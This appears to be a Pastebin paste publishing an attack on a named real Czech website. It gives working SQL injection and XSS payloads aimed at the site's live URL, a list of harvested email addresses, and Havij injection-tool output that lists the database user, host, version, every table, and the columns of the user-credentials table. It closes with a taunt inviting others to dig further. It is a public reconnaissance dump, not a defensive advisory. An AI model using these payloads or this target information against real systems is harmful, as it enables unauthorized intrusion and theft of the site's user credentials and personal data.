API tools faq
paste
Advertisement
sroub3k

azd.cz

sroub3k
Mar 30th, 2013
380
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.43 KB | None | 0 0
raw download clone embed print report
  1. ||| SQL Injection
  2.  
  3. Severity: Critical
  4. Confirmation: Confirmed
  5. URL: http://www.azd.cz/?str_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  6. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  7. Parameter Name: str_id
  8. Parameter Type: Querystring
  9. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  10.  
  11. ||| [High Possibility] SQL Injection
  12.  
  13. Severity: Critical
  14. Confirmation: Confirmed
  15. URL: http://www.azd.cz/?str_id=%27
  16. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  17. Parameter Name: str_id
  18. Parameter Type: Querystring
  19. Attack Pattern: %27
  20.  
  21. ||| XSS (Cross-site Scripting)
  22.  
  23. Severity : Important
  24. Confirmation : Confirmed
  25. URL: http://www.azd.cz/?str_id='"--></style></script><script>alert(0x001AFA)</script>
  26. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  27. Parameter Name: str_id
  28. Parameter Type: Querystring
  29. Attack Pattern: '"--></style></script><script>alert(0x001AFA)</script>
  30.  
  31. ||| Database Error Message
  32.  
  33. Severity: Low
  34. Confirmation: Confirmed
  35. URL: http://www.azd.cz/?str_id=%27
  36. Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
  37. Parameter Name: str_id
  38. Parameter Type: Querystring
  39. Attack Pattern: %27
  40.  
  41. ||| MySQL Database Identified
  42.  
  43. Severity : Information
  44. Confirmation : Confirmed
  45. URL: http://www.azd.cz/?str_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  46. Parameter Name: str_id
  47. Parameter Type: Querystring
  48. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  49.  
  50. ||| E-mail Address Disclosure
  51.  
  52. Severity : Information
  53. Confirmation : Confirmed
  54. Found E-mails:
  55. [email protected]
  56. [email protected]
  57. [email protected]
  58. [email protected]
  59. [email protected]
  60. [email protected]
  61. [email protected]
  62. [email protected]
  63. [email protected]
  64. [email protected]
  65. [email protected]
  66. [email protected]
  67. [email protected]
  68. [email protected]
  69. [email protected]
  70. [email protected]
  71. [email protected]
  72. [email protected]
  73. [email protected]
  74. [email protected]
  75. [email protected]
  76. [email protected]
  77. [email protected]
  78. [email protected]
  79. [email protected]
  80. [email protected]
  81. [email protected]
  82. [email protected]
  83. [email protected]
  84.  
  85. ||| Test - Havij
  86. - Small warning ! ( The program did not load data or items are not in any database data :D )
  87.  
  88. Target: http://www.azd.cz/?str_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  89.  
  90. DB Server: MySQL
  91. Resp. Time(avg): 3243 ms
  92. Current User: azd_cz@localhost
  93. DBMS Version: 5.0.89
  94. Current DB: azd_cz_db
  95. System User: azd_cz@localhost
  96. Host Name: doyle.netservis.cz
  97. DB User: 'azd_cz'@'localhost'
  98. Data Bases: information_schema, azd_cz_db
  99.  
  100. Keyword defined by user: Duplicate
  101. Injection type is Integer
  102.  
  103. Current DB: azd_cz_db
  104. Count(table_name) of information_schema.tables where table_schema=0x617A645F637A5F6462 is 75
  105.  
  106. Table found: archAnkety
  107. Table found: pages
  108. Table found: pages_language_overlay
  109. Table found: refKML
  110. Table found: sysEmaily
  111. Table found: sysFoots
  112. Table found: sysPageMenu
  113. Table found: sysPhotos
  114. Table found: sysStyles
  115. Table found: sysUsers
  116. Table found: sys_refindex
  117. Table found: tabAkce
  118. Table found: tabAkce_meta
  119. Table found: tabAktuality
  120. Table found: tabAnkety
  121. Table found: tabAnketyMoznosti
  122. Table found: tabAntiBF
  123. Table found: tabCache
  124. Table found: tabCacheURL
  125. Table found: tabClanky
  126. Table found: tabConfig
  127. Table found: tabDPH
  128. Table found: tabDiskuse
  129. Table found: tabDiskusePrispevky
  130. Table found: tabEmaily
  131. Table found: tabFormulare
  132. Table found: tabFormulareEmaily
  133. Table found: tabFormulareOdeslane
  134. Table found: tabFormularePole
  135. Table found: tabFormulareStranky
  136. Table found: tabFotografie
  137. Table found: tabGM
  138. Table found: tabGMbod
  139. Table found: tabGMtypBodu
  140. Table found: tabHP
  141. Table found: tabKatalogy
  142. Table found: tabLanguages
  143. Table found: tabModuly
  144. Table found: tabNewsletter
  145. Table found: tabObrazky
  146. Table found: tabOperace
  147. Table found: tabOpravneni
  148. Table found: tabOpravneniDefinice
  149. Table found: tabPrihlaseni
  150. Table found: tabProdukty
  151. Table found: tabProduktySoubory
  152. Table found: tabReWriteID
  153. Table found: tabRegistrovani
  154. Table found: tabRssMirror
  155. Table found: tabStatistikaFulltext
  156. Table found: tabStranky
  157. Table found: tabStranky2
  158. Table found: tabVideoNastaveni
  159. Table found: tabVyrazy
  160. Table found: tabVyrazyPreklad
  161. Table found: tieAkceSouvisejici
  162. Table found: tieAkceSouvisejiciClanky
  163. Table found: tieClankySouvisejici
  164. Table found: tieNewsletterAkceEmaily
  165. Table found: tieNewsletterClanky
  166. Table found: tieOpravneniModuly
  167. Table found: tieOpravneniStranky
  168. Table found: tieOpravneniUzivatele
  169. Table found: tieProduktySouvisejici
  170. Table found: tieRoleUzivatele
  171. Table found: tieStrankyAkce
  172. Table found: tieStrankyAktuality
  173. Table found: tieStrankyClanky
  174. Table found: tieStrankyProdukty
  175. Table found: tt_content
  176. Table found: tt_news
  177. Table found: tx_dam
  178. Table found: tx_dam_cat
  179. Table found: tx_dam_mm_cat
  180. Table found: viewStrankyNadrazene
  181.  
  182. azd_cz_db.sysUsers
  183.  
  184. Count(column_name) of information_schema.columns where table_schema=0x617A645F637A5F6462 and table_name=0x7379735573657273 is 17
  185. Column found: ID
  186. Column found: User
  187. Column found: Password
  188. Column found: Name
  189. Column found: LName
  190. Column found: Phone
  191. Column found: Email
  192. Column found: Active
  193. Column found: NTAdmin
  194. Column found: Registrace
  195. Column found: Od
  196. Column found: Do
  197. Column found: Access
  198. Column found: LastIP
  199. Column found: LastCookie
  200. Column found: Login
  201. Column found: Poznamka
  202.  
  203. For more fortune to the database for you ..
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!